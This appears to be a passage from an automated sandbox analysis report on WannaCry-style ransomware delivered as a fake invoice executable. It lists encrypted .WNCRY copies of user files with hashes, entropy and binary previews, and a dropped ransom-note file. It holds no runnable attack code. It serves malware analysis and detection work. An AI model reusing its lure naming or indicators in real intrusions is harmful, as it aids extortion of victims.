                                                          Preview:WANACRY!....:._z#|.ap.mFO....S.T.....`(..F..|M3...1..;..w..6...0.1..{:..e.6...M...P;(F.......L..@.up..;.%....7.......p.E......k.NA...?......xVGM.hw...<.R...&.#=.....r67._.SO+..-..F........<e..5...V~.r....c.%.i.ZG..."-...E.Pn.yVm...x.q..+....6..z.zN......u..%............f. ..>.e....Y..R..b.<VI.x...x..r..... ~)o...9....@T...S.}7..C%vEnz.AD..KM.......o...v..j+m.r&.1.g.n...V.{.N.S..3Vl.O..0.W..[.t........7....^u].{r,2..e.Ej...`.R/.@=PU..q....S.y......V*...B5..s.x\.@..............h....I....Oe.h[.n.?.....2..+..].......MR.).T._.L...j..W!.........Ee....l.......tZd.$....a...........T.5..9n4P.=.....3.....K..TH.HL.BU..3Z....|.....~.bhw.....}3z...wLdC-..M..$.......<.3L......!.\x{......:.....H.]...y.....~.......l.:....u}...g+.L..7e.....I..8....r.~.?`)'8.~?.2..S.p...L.._...6.....V?y.O...0...Z-...j...o.w!C.........0......+.J.r.p..nveZ.K.../2.U0..C)H5....Q".......f...Ns..y..p|.1..%A...0...)F.*!j..3;...@.....B...7.F....Zy56.F.....^....[!...)..C..r

                                                          C:\Users\user\Documents\HMPPSXQPQV\VWDFPKGDUF.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7842309560531975
                                                          Encrypted:false
                                                          SSDEEP:24:ndHzTg1FkuH201oYNdw7SJvX2cx2/BV36O7NHIb2gAIMi:n5inVkk2pV39ZHMBj
                                                          MD5:95BA734036D042FF4959AA2EA0F28DF2
                                                          SHA1:581AFECFA672896C8A09EB82E079D6DBAA2CE94C
                                                          SHA-256:CC21DEE97C14CC783844A307040327C3E8A3CA3B37E208BDDE31FD940F16F207
                                                          SHA-512:B48FA94BBC999C36D2E918D0320507C4719F9E070E11175BD53BB0061823B4CD3B331A338FCB7F377C25440AFA1FF1A7EADED583B630FD6E661A5F7770BDB9F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:].o}....~1.]...0]fJ....q+.q.G..hj0.R. ..S.U.G.90....RV..Nz5.Er..l.E#z...1#.=.u..i@.`..k>..C..w.$... ..[.s]..d".*....~.5.6.W-\.7.H.....dC.K.?0...5i1..-^.]...g.tR.;..%_..g...P..s..r.V...[E_..=33.Z.6<'...f./.&[WR&.^..IT.....,d..g]..A..l..u.4.2-V.X.....1)...z.-..g..5..O...X3.@9>Y.3hOw.]..m../Z.E.......zV......B.e.......xg.p.../.a...EV...y..y.7v#qT@..X....g8.b(.j"g....e..,..}..*.C.i:.Vq../.J97.....X..d...K...0z..1.m..|_.E..R..&...WF..Z[Q`.})u.|Sa.8?K.K.CI.......QJ..za...c...p.A.~..:......'..5qajW@K...'CkG:HYRQT.w\....-."...jr...Z.W'(S.87$.....P...m..'.......2..j.U....]_a.X.t)..'...6....Kk...........iV$q......l.1....b....k]R.A.......%....X.....3..4.#..g...K.Z....[x\..KJ...... ....d.s.B..h.C...g.....&.l.8P<(G...O.d ..^.....Z.P...%...G1<..O?.....-1,....-.._Kn...g.~.&>{'.0s.'.k..U..{.|2..F.)E5.0....;..w..N.q.0.._=t.......(.R...A.m..<M.k6..nhx...~..9.a...p..........1._8...R...*.yI...9m./I*.B.3&..n..g..k.eZ.c..rE.%.2x.&7Qf.......H...V.......^..,bu

                                                          C:\Users\user\Documents\HMPPSXQPQV\VWDFPKGDUF.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.869041184699475
                                                          Encrypted:false
                                                          SSDEEP:24:bkDVeUH8dnoEOvcvXDV0jUQoLpkNxU+B65AjtBSglqPF07Vwuq:bkDw/nccv2AQ+cUBWjbSglAF07Wuq
                                                          MD5:70B648B97BFB02402B55FCF9478DE602
                                                          SHA1:EC147CE919CCEC616391BE05326E4C8ADF485FCC
                                                          SHA-256:DB0DBB2DE7D509D66AB93D0C4EBD00AF97B82EC3D8818534C4727DFC633B85C6
                                                          SHA-512:20187E9B3F8698412A0DE2C3F36B0FE6946B1C65814F99E0E8FAA38FCBA10D55B05A5859468C7FB9ABE1C2ACD4DFEAF9E3EC06FB57B0DAE77D58A38FA749AA6C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....m.....P..<B....z...!...@.^9[..L.Vk?m.d..I........Q.P....d........a\...u.f....e)S....L........f.+.?.=n...!s...V9<...........N_G.Q;.......`K}'.Hu;.".s... ..e$f.W.....N...(....l...{...zM.qc.P.i...|_.........*....)..Z.cp?..a.ap..8..l?.&....e4<fF...............~.i....L..J.C..7.%s...p.U.Mh...T...j..............kM.j.o}.B..OXY...$.$.,..W..K..p.6..t.Qw....8..t...O.-.5.?\.?.'.P7o.(...*6..;....`Nb.....0.!..e|..........+..}.9..W'H4...W..O{.....3.V$rSg..m..&....^.o6.S[._.^..gs.3...T.[....%.1....]^$....h...ul.......N..L5....Z.CD.*.k).w..&5...>&z...}Tb......H. ...4....&e!..t..s...}..0bcW.Y!..B..6.[.#~...*'qO.m_. .^.....7.....m.:....[.58..i7...z....zRkH27.3D.D>.(._..0..\%..a.9..f|.&.C..@.'.4..F.+..+..h...0....4.m.g.&...*!X...fz..B.A......XM...~.k.10%..)6..'......)..xcE.T;r*'/...s..EH.Ktq.}..z...d.%...g..L...L.%JK......QL......r....P.j........"..Q.K.....6!..>V.{.t.g.......G.F#...Y.S...*OIl|)...~`u....)^E8<...C..&..>w......H...iDU..[.|...I..1O%W.7..n

                                                          C:\Users\user\Documents\HMPPSXQPQV\VWDFPKGDUF.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.869041184699475
                                                          Encrypted:false
                                                          SSDEEP:24:bkDVeUH8dnoEOvcvXDV0jUQoLpkNxU+B65AjtBSglqPF07Vwuq:bkDw/nccv2AQ+cUBWjbSglAF07Wuq
                                                          MD5:70B648B97BFB02402B55FCF9478DE602
                                                          SHA1:EC147CE919CCEC616391BE05326E4C8ADF485FCC
                                                          SHA-256:DB0DBB2DE7D509D66AB93D0C4EBD00AF97B82EC3D8818534C4727DFC633B85C6
                                                          SHA-512:20187E9B3F8698412A0DE2C3F36B0FE6946B1C65814F99E0E8FAA38FCBA10D55B05A5859468C7FB9ABE1C2ACD4DFEAF9E3EC06FB57B0DAE77D58A38FA749AA6C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....m.....P..<B....z...!...@.^9[..L.Vk?m.d..I........Q.P....d........a\...u.f....e)S....L........f.+.?.=n...!s...V9<...........N_G.Q;.......`K}'.Hu;.".s... ..e$f.W.....N...(....l...{...zM.qc.P.i...|_.........*....)..Z.cp?..a.ap..8..l?.&....e4<fF...............~.i....L..J.C..7.%s...p.U.Mh...T...j..............kM.j.o}.B..OXY...$.$.,..W..K..p.6..t.Qw....8..t...O.-.5.?\.?.'.P7o.(...*6..;....`Nb.....0.!..e|..........+..}.9..W'H4...W..O{.....3.V$rSg..m..&....^.o6.S[._.^..gs.3...T.[....%.1....]^$....h...ul.......N..L5....Z.CD.*.k).w..&5...>&z...}Tb......H. ...4....&e!..t..s...}..0bcW.Y!..B..6.[.#~...*'qO.m_. .^.....7.....m.:....[.58..i7...z....zRkH27.3D.D>.(._..0..\%..a.9..f|.&.C..@.'.4..F.+..+..h...0....4.m.g.&...*!X...fz..B.A......XM...~.k.10%..)6..'......)..xcE.T;r*'/...s..EH.Ktq.}..z...d.%...g..L...L.%JK......QL......r....P.j........"..Q.K.....6!..>V.{.t.g.......G.F#...Y.S...*OIl|)...~`u....)^E8<...C..&..>w......H...iDU..[.|...I..1O%W.7..n

                                                          C:\Users\user\Documents\HQJBRDYKDE.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.826740455017789
                                                          Encrypted:false
                                                          SSDEEP:24:ky5LyPprUNOB8Ew7Hdgjtz6j9VWZxnwazEnjZWrjt/CBXxnPatM:ky5ePi4BMgjtuGp/zEnj0KBxPam
                                                          MD5:1B9ADB6B79020F9EE44EEA448B9C2E22
                                                          SHA1:6813DB65A6C90F6F5B276439FD9F6928BCA7D949
                                                          SHA-256:F21E3BA556C85DFCD4D6E88F66A8712BBD64E7D4D4BE269924C736E0826B5652
                                                          SHA-512:BCA1F27555D78D7336CBE139EFC0B40C2EFF78FD518D8E1535FBEB668BEA1620FCABF5FF2DED2A8EA2530B360A0A837D0E32690D1672142EB7C843DFEF641ED9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.j....f.!.q.?.........T.)...Y.....[. .ncXy.c..n..:.#.2.^.....o.].NM.....Qe.FT.w...1e..V.P>."..9.A..D.!.........|..,Gu..^...}.t.G&?G#..y...U...<i6Ckp.o.)..96l..=....c..1.jX7%2.`......6...M....1....S.a.4..d,....... .S......n..1.m..c...YF.t./.....J.P.+../..5A\:.,L5..k...z.G.^Il.w..aU..f....J#.x...%...L.........._.X.y.[.....u+~..ET..}h..n..{.P0..}Y.%...E x..J.B.~.,+...kqX.j.;.Yy.f.;W.,`.S......A*2.....s...F....;}.Y....c@.L..z.K....Mz......Q..7..3......KO....4..:.k...j.%.5.a.|4$..(....a.a..ql..~...P...u....r.,U....&.......Z.f..#....,.)..<..+j...........G..~.P.h..d^.>=Z9.^j..t......5....4...=.&.N{O.1....R8.^^....?..?W..!t=.;..x...f....>.0\...9y..Wus._..J..p.2_.T...c.\..6.$....l.3.....i........NK(u...m...-.....x.C.-.-2....W.o..N...Q2.7...v.H......R.T.A.....0x.1..J*..1l.:nY)......*.2...1...O..g..8..Lsg...G..,.....e.......$.W.L...u.. ....P...........R....7 I.t4..B.z......<...V...1(Ol.k-!..;.`.'..6x.;.#$B......F..C.X....%.Pgb4.>)A0.....g.uK..

                                                          C:\Users\user\Documents\HQJBRDYKDE.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845805609189279
                                                          Encrypted:false
                                                          SSDEEP:24:bkleYstSMIL6v2g51UGUQilk2CBa1RiD4kq/Lw1b2EYYfxln:bkWtFjeBCgRxFzwF2Ehl
                                                          MD5:AFEB48AFE166A10E0008CC5AC1F3AD6C
                                                          SHA1:D599B0F23B7A7119D3B14BDB904D47C1473FA98F
                                                          SHA-256:FFF3D479C8698A5B3571963AB95F05878BCB6CD4B670228BFB9018B771957B65
                                                          SHA-512:B7980CF51FA76CC2D9A26CC24F18A49367382C3AF85C2CB53D99249EF75A57770088247A4737475E7FEED2C311516535C34A6F9668F74D2504E9EE86EEFCEDFA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..... ).&'.+..b...S.h.7=.U..h`....@.~2..5m.1.Xy....LL....M..+.b.d..l.......z......v?.x.$....u..@...U]\i....GXM.....FU.......,e.l....7......3z.7...-..KF...$.H....z.%.....c....$...i.'.d.(..2`..j&...,60...]I=xoh....M._.F.../.`...1Q{C....B{/.eG.C.vP..............j..m..\@f..!<...5......-....4........$..;>..!.@....2.{..`............I._..ad.p.\\*UVH.."?EU6Q.Q...zV......_`Y.U..!?.V.$.i..!.....a._.^k...3.uU]!.9....Z0$..RP..1.>..R..@).....46.d1..<..[W..cz..T.|..~.Y6.....g...l.?.O..[.@..G.AV.....y#[].59....;I..5.-.........`....$.... ..?ud.Q=...1IQ.`M.[.=.....|...Ga......C.c..8.....Uv..kXV.asO...r9..>..YZ.=...I5...]1......(..i.j.$..l,..ghy.Z..IC...7h..&.b.n....y..$..Wv...,.^.hI...WbG...F...y...~.H.#.r0)...._.]{5......"......79..8.J..L-...O.w..p.me..L..(_...i !...Id.+...-o..a.4.........?.19..|_.>.......k$.E...B.n....M.j..O.J$W8.NE.)..%.#.GI[J`....g..XD.fT.>.V......J2.%m.....n,.k..n..8o.S...6..8.k...;.pY.l..).\...D.oc.....R.=..Ap.Ni..S..12~Y...

                                                          C:\Users\user\Documents\HQJBRDYKDE.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845805609189279
                                                          Encrypted:false
                                                          SSDEEP:24:bkleYstSMIL6v2g51UGUQilk2CBa1RiD4kq/Lw1b2EYYfxln:bkWtFjeBCgRxFzwF2Ehl
                                                          MD5:AFEB48AFE166A10E0008CC5AC1F3AD6C
                                                          SHA1:D599B0F23B7A7119D3B14BDB904D47C1473FA98F
                                                          SHA-256:FFF3D479C8698A5B3571963AB95F05878BCB6CD4B670228BFB9018B771957B65
                                                          SHA-512:B7980CF51FA76CC2D9A26CC24F18A49367382C3AF85C2CB53D99249EF75A57770088247A4737475E7FEED2C311516535C34A6F9668F74D2504E9EE86EEFCEDFA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..... ).&'.+..b...S.h.7=.U..h`....@.~2..5m.1.Xy....LL....M..+.b.d..l.......z......v?.x.$....u..@...U]\i....GXM.....FU.......,e.l....7......3z.7...-..KF...$.H....z.%.....c....$...i.'.d.(..2`..j&...,60...]I=xoh....M._.F.../.`...1Q{C....B{/.eG.C.vP..............j..m..\@f..!<...5......-....4........$..;>..!.@....2.{..`............I._..ad.p.\\*UVH.."?EU6Q.Q...zV......_`Y.U..!?.V.$.i..!.....a._.^k...3.uU]!.9....Z0$..RP..1.>..R..@).....46.d1..<..[W..cz..T.|..~.Y6.....g...l.?.O..[.@..G.AV.....y#[].59....;I..5.-.........`....$.... ..?ud.Q=...1IQ.`M.[.=.....|...Ga......C.c..8.....Uv..kXV.asO...r9..>..YZ.=...I5...]1......(..i.j.$..l,..ghy.Z..IC...7h..&.b.n....y..$..Wv...,.^.hI...WbG...F...y...~.H.#.r0)...._.]{5......"......79..8.J..L-...O.w..p.me..L..(_...i !...Id.+...-o..a.4.........?.19..|_.>.......k$.E...B.n....M.j..O.J$W8.NE.)..%.#.GI[J`....g..XD.fT.>.V......J2.%m.....n,.k..n..8o.S...6..8.k...;.pY.l..).\...D.oc.....R.=..Ap.Ni..S..12~Y...

                                                          C:\Users\user\Documents\LHEPQPGEWF.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.794803001924923
                                                          Encrypted:false
                                                          SSDEEP:24:Bz4SAImiN7IVEZ6/QqozCs/uCuwutQpYUGueuqYED1UZ7b7n:BW7iFIEo/JYCsdm0pebJmZP7
                                                          MD5:1D13DA032FA361CFB76B5CFF5719FE82
                                                          SHA1:F5F31E4C36928A6C6BDD303114ADED800353D32A
                                                          SHA-256:D545D870A3C5CB77E2CDC2D12CA65A845122E33FC478E97978429F74AC6AF919
                                                          SHA-512:CA5B4CF764DA508031102AEE136D773CEADC25A4F3002F7E8887647CC7543C29A17C14B14285BC8CA73CE36109D345C4D57DD9198D4233803654166FC7EC9B94
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...o...........8).v...}:.Y4[.C&.oXX`pi.k..R`.....4.r.....W..v.....z.R.a....k..b8_...0..G_..9.+.$........l.]1.u.......u.k......o.T.....W.sLD._Rq.&B..&....t..5HY......O.3....PK\0.*'ZN....(....3..Hw1..Q.{.[..$W......h.[..-.|cSt.3.Y..R.<.o.uu...{*.0b..K..h``N<.........,..T...G.MsV;..U....M<.s.S\h.....\...Q<).pl'..Vd^.S.t....G...8.K+..3.j.....{.@g......tt..'..0.yW...%M...{.@"...<?..Jm.a.j-`.wH.Q.)....'E.......a..m..u...xc]`SX.AO..:..{.h.....&..?..W!...9..J9.....Q....b#.y..L.f.....R|.Oa.P.EA..`1..AG.%F+.....l5.kH.%6.........A.M6....V..2.aq`Z..t.P.o.Z.H.....)........1....BG.&.l...t.{G..P...i.1.e:.....M......9..p.I ..#.;....-N.T.....'F...7....R...Nj..Om..|j...!X...Da/.n.!......>S.......$9t..:a).bC.D.....Yo.....<...n.s s.0c......D(.... ....]2.t..6..m..t@..%R.~...@\.....eJ....(.-...!=be.1.;QE.Pb5RPr..<..j.eu........$...??s...c..3.>T..v#,P......3{...............E.. uv<..g.D.....O.tk7wN.......X..Su,.jWU.s.y.`oi...r...H.m......C....0^`.}x..m.1.8.$w.=E..

                                                          C:\Users\user\Documents\LHEPQPGEWF.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858690640183778
                                                          Encrypted:false
                                                          SSDEEP:24:bkCOuswUdT9J4/t2nE668lEECuefUFqbbC9x3p1jBTylNj2YbWhaO776Qn:bkCJswUdT9JWt2nEQEEkaq69ZBG/6asN
                                                          MD5:715EB04BB36015A6B880A7E18B4850EF
                                                          SHA1:AD37052046B3BEEDC8DB87AB9458AC5E079860C6
                                                          SHA-256:47979895D17FEA64797BC184D11E7502A09FAB108B3514D7C5ED549DB30A6159
                                                          SHA-512:DCEA26EE924D186532FAEF5C7FBB0492D43DCDBCB1BC95568F0677FD3471D79F893801494C38341D14B7C5CBF95782467549213B2D9A2E93DCD2D636387B2C9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......SM...;..!..].{.....Z....l..pA&d.....e"^,wJ.......PtM..S.AK.y4...vl_z>.2B.......!If........Q..T.lh.V.G.......vA....K}.e......c.....b/...|...T....5=....i..5.......<..s.[. .?c#...O.8..n.Z..;\H..dnR...._M...I!p6...h.`.e....2.%.P..j..T..[v#n..K............{#`.^*.%..Y..!...V.....s+.(...........x2.....v.....(...L.............<...g...>.=............=.K.....t6.3(.2E.'J...*.v58..l.zF.*v$.....*...h.<.+P.&O..NLR8.....a{i..ewX.#..W:R#.s.#P.+..)..#....=......C..x..r....P..wX.O..=..\.\...t.......P..G...$...\9..?..a....~.L.9U..d.......?........gsF-69.5. ...$a0...... .O*>h..{;.....N. R.x2.A..`7'.+.e.iWc...5.xvOb;G.@....N..2.?.j....I.B..b.u..0.....*;_....OD..$o..Y.f;!......^..!=.M*j...U...K>.....V*.....?~........g.C..6.M.Qn:..9.. ...."..{x..&.R2....y_.[y.L|.(...S.....E...cjx...o.qs.......@-B.h..?.=.....+....i.[..<......|+....Y....yS..^.....%Kq.p....o/.V.z..+...%.:..'..z\1t.../)37.Q..f....].@...,.....K.I.Ff........:ynzC%....<....'n..(K..U.

                                                          C:\Users\user\Documents\LHEPQPGEWF.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858690640183778
                                                          Encrypted:false
                                                          SSDEEP:24:bkCOuswUdT9J4/t2nE668lEECuefUFqbbC9x3p1jBTylNj2YbWhaO776Qn:bkCJswUdT9JWt2nEQEEkaq69ZBG/6asN
                                                          MD5:715EB04BB36015A6B880A7E18B4850EF
                                                          SHA1:AD37052046B3BEEDC8DB87AB9458AC5E079860C6
                                                          SHA-256:47979895D17FEA64797BC184D11E7502A09FAB108B3514D7C5ED549DB30A6159
                                                          SHA-512:DCEA26EE924D186532FAEF5C7FBB0492D43DCDBCB1BC95568F0677FD3471D79F893801494C38341D14B7C5CBF95782467549213B2D9A2E93DCD2D636387B2C9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......SM...;..!..].{.....Z....l..pA&d.....e"^,wJ.......PtM..S.AK.y4...vl_z>.2B.......!If........Q..T.lh.V.G.......vA....K}.e......c.....b/...|...T....5=....i..5.......<..s.[. .?c#...O.8..n.Z..;\H..dnR...._M...I!p6...h.`.e....2.%.P..j..T..[v#n..K............{#`.^*.%..Y..!...V.....s+.(...........x2.....v.....(...L.............<...g...>.=............=.K.....t6.3(.2E.'J...*.v58..l.zF.*v$.....*...h.<.+P.&O..NLR8.....a{i..ewX.#..W:R#.s.#P.+..)..#....=......C..x..r....P..wX.O..=..\.\...t.......P..G...$...\9..?..a....~.L.9U..d.......?........gsF-69.5. ...$a0...... .O*>h..{;.....N. R.x2.A..`7'.+.e.iWc...5.xvOb;G.@....N..2.?.j....I.B..b.u..0.....*;_....OD..$o..Y.f;!......^..!=.M*j...U...K>.....V*.....?~........g.C..6.M.Qn:..9.. ...."..{x..&.R2....y_.[y.L|.(...S.....E...cjx...o.qs.......@-B.h..?.=.....+....i.[..<......|+....Y....yS..^.....%Kq.p....o/.V.z..+...%.:..'..z\1t.../)37.Q..f....].@...,.....K.I.Ff........:ynzC%....<....'n..(K..U.

                                                          C:\Users\user\Documents\LIJDSFKJZG.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.796433958163932
                                                          Encrypted:false
                                                          SSDEEP:24:tqa3zgyJjFt930WONc/eA8fRJBRecBHkhxOVX9KX4xIyp6F:tqOhFt9sS85JBgcGxO5oXeIyYF
                                                          MD5:E2C00131F909FE4E42CB182642A9DD32
                                                          SHA1:71ADAB836A6A366EA05B3B7D1241A5FC953A98A1
                                                          SHA-256:6B225032D4D58F79369B0C3351D110832D852738AD0B236ADE745D4E15839287
                                                          SHA-512:E6F58B02C8470F00F840FD899F5EA9A5CFC2957BE4DD7F006BF33E52C8F3D38BB23FEEE040CE3A79C539B6B1ECAB5CBAE1FF8ED21B3CEF4C1FC7DCA6DF46C534
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:....E...c..U......W.6..........T\(R....n...#...L.~....Ub.-N.y.|..N#;.P.p..5.)....B...x..9.L..t...f.u...OlC.xa#L...._t...K.6G.A...d..&...9..t.J.......a.."....:g.N4....6w..g...f!....L..y.D.....*.W..,......\.]KO.h.W.\......V....y....J.o.....i...X.9..../....d~..[....M.'2/O.b.2 .!..,.....v`.M..Pa..h....r.9d*..a=d.p,..TA.-..Ck...4...?4G..|)1....O.^.?.-.O.^...H..v8-......d..D...f.............\D3.X(>[.8..-23..R.,.Sq..[.l#kt.(..<.....V..fc..b.v!..F...........6.6HEY.:yg.........T....k&..37....N.5w.5..=.l.)......x.*M..}-.(%..0+...ov.F..\.d..NAx]b.....P.h"...n!-u...k%.J.!......j.D.u..].F..r.7...V...u....b.ETlC>.l4.d|..3....clc..C..`....i.F..N..4.....L...[...i.z.0..en......~V.....!..0.l....@...V..z.....$..L/....}h...w.4.az...R..T.-G..y-b....".....tN7M..0j.......9....TO..S..Vh./.^l#O.0n..}. ..1...&...\.(#.&mF...R@=......o...d...mRq.g....3..`..H!..Y....L...U.-g...5........\.Fz."x...f..P .._.0=+0n.....3..qWVb..j..4.4.Y.........$.V~f..e.-.n.U`..n.-...H

                                                          C:\Users\user\Documents\LIJDSFKJZG.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.832514990313752
                                                          Encrypted:false
                                                          SSDEEP:24:bklWQ+wYMip78VhhQhksXGm3pY06UFkbsmzkRPbDJd6zZBoD7jq+dH1P9eOB5:bklWtwYMiGjZs2GJ6sVbDJOfc7jqqVwo
                                                          MD5:63EA01A55A44A6A13149BA61924F4A58
                                                          SHA1:60EBACF02CDDBA0DDF02735E026F3D3B3A267962
                                                          SHA-256:4F5446989D99F1E899FBD1CFDC3521F4F8C423A7A63EFE28AE1FFC8D3400F8EB
                                                          SHA-512:25F10DC640D524344ABC3A5B44A651835A57C969E8668101EA551A0EEFD8288BB7324F47C2A4BED606862A75EA6ED126708FF248EFED85117F9EC98E28C8D188
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........y..8.v..<.Bg^'....^.....t...../...k.)...5.A..Q#..wio...$.?P....t..p...f..z...(Wc..A...[...r2].x.+.x5s.6%..=...E.W.y...!.>.j.T.(.1si..o.UXb.r.....]\_p...WY\"/...^Q.i5T.~`...B.....L.......'.r.C.}s..].`........o......q..........\.k...`..F..n.............|3..N.0A..K.......2..N.t.....W(h uf6.0..$R{.v.^.,......vw....?J.(5...&.-%....[o..!P.....#F.$.h.an...H...c[..$..j.W.!l...I9.o.&0.W...u..}.J...3.........(.I.4..7....6R.....H.z<...U.dD...a.o...H....XT..b..,..{.E..t.......h~F....9...jH.R<N..!r.|...>;....xm...b?h.9Q.<.........."..h%.E..bT.rC.\c..X..8.LK.o].BI.....h}:......i..i.~..*..1....K..r1.....L.............<...%.Q..n.....\.......6c..E...=........k.......;....<..v..>^o.l.A.C....]p./i@$.XA.N..84..f.M.(..Ai.@.u7.c..c.=.y.....0x..E.z....20..o/B.Os..s...#{.....r.'.7..\tv_. .fl.....u.z.O1.9%4....C.M......v.%....E..o.k[d....A.. .|..l;.c...1...{.y.o*.;...-.p.....6...t.o.r.MaEX..1K...k...*y.@Q8./.}.4. .2:.#$...&..-....x.t.\sN.(..*.

                                                          C:\Users\user\Documents\LIJDSFKJZG.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.832514990313752
                                                          Encrypted:false
                                                          SSDEEP:24:bklWQ+wYMip78VhhQhksXGm3pY06UFkbsmzkRPbDJd6zZBoD7jq+dH1P9eOB5:bklWtwYMiGjZs2GJ6sVbDJOfc7jqqVwo
                                                          MD5:63EA01A55A44A6A13149BA61924F4A58
                                                          SHA1:60EBACF02CDDBA0DDF02735E026F3D3B3A267962
                                                          SHA-256:4F5446989D99F1E899FBD1CFDC3521F4F8C423A7A63EFE28AE1FFC8D3400F8EB
                                                          SHA-512:25F10DC640D524344ABC3A5B44A651835A57C969E8668101EA551A0EEFD8288BB7324F47C2A4BED606862A75EA6ED126708FF248EFED85117F9EC98E28C8D188
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........y..8.v..<.Bg^'....^.....t...../...k.)...5.A..Q#..wio...$.?P....t..p...f..z...(Wc..A...[...r2].x.+.x5s.6%..=...E.W.y...!.>.j.T.(.1si..o.UXb.r.....]\_p...WY\"/...^Q.i5T.~`...B.....L.......'.r.C.}s..].`........o......q..........\.k...`..F..n.............|3..N.0A..K.......2..N.t.....W(h uf6.0..$R{.v.^.,......vw....?J.(5...&.-%....[o..!P.....#F.$.h.an...H...c[..$..j.W.!l...I9.o.&0.W...u..}.J...3.........(.I.4..7....6R.....H.z<...U.dD...a.o...H....XT..b..,..{.E..t.......h~F....9...jH.R<N..!r.|...>;....xm...b?h.9Q.<.........."..h%.E..bT.rC.\c..X..8.LK.o].BI.....h}:......i..i.~..*..1....K..r1.....L.............<...%.Q..n.....\.......6c..E...=........k.......;....<..v..>^o.l.A.C....]p./i@$.XA.N..84..f.M.(..Ai.@.u7.c..c.=.y.....0x..E.z....20..o/B.Os..s...#{.....r.'.7..\tv_. .fl.....u.z.O1.9%4....C.M......v.%....E..o.k[d....A.. .|..l;.c...1...{.y.o*.;...-.p.....6...t.o.r.MaEX..1K...k...*y.@Q8./.}.4. .2:.#$...&..-....x.t.\sN.(..*.

                                                          C:\Users\user\Documents\LIJDSFKJZG\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
